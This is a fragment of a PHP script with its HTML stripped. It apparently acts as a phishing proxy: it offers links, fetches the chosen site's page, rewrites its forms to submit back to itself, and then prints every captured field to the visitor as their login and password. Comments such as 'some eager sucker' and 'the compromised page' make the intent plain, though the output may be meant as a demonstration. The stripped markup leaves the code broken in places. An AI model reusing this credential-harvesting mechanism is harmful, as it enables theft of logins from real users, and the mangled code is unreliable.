\n";
print "Be afraid. Be very afraid.\n";
print "
\n";
print "You just gave me your login and password for the following Web site:\n";
print "
\n";
print "
\n";
foreach ($_POST as $k => $v) {
print "
$k: $v
\n";
}
foreach ($_GET as $k => $v) {
print "
$k: $v
\n";
}
print "
\n";
print "Have a nice day!\n";
print "\n";
exit();
}
# if one of our links was not submitted, print the list of links
if (!isset($p)) {
print "\n";
print "Useful Links\n";
print "
\n";
print "\n";
} else {
# here we go ... some eager sucker has followed one of our links
# first, parse the URL in case we need to supply a base href later
$url = parse_url($p);
$base_href = $url[scheme] . "://" . $url[host] . "/";
# go grab the page
$handle = fopen($p, "r");
$contents = "";
do {
$chunk = fread($handle, 8192);
if (strlen($chunk) == 0) {
break;
}
$contents .= $chunk;
} while (true);
fclose($handle);
# stick it all in $data
$data = explode("\n", $contents);
# go through $data line by line
for ($i = 0; $i < count($data); $i++) {
if (stristr($data[$i], "";
}
# dump the compromised page to the client's browser
foreach ($data as $line) {
print "$line";
print "\n";
if (stristr($line, "\n";
}
}
}
?>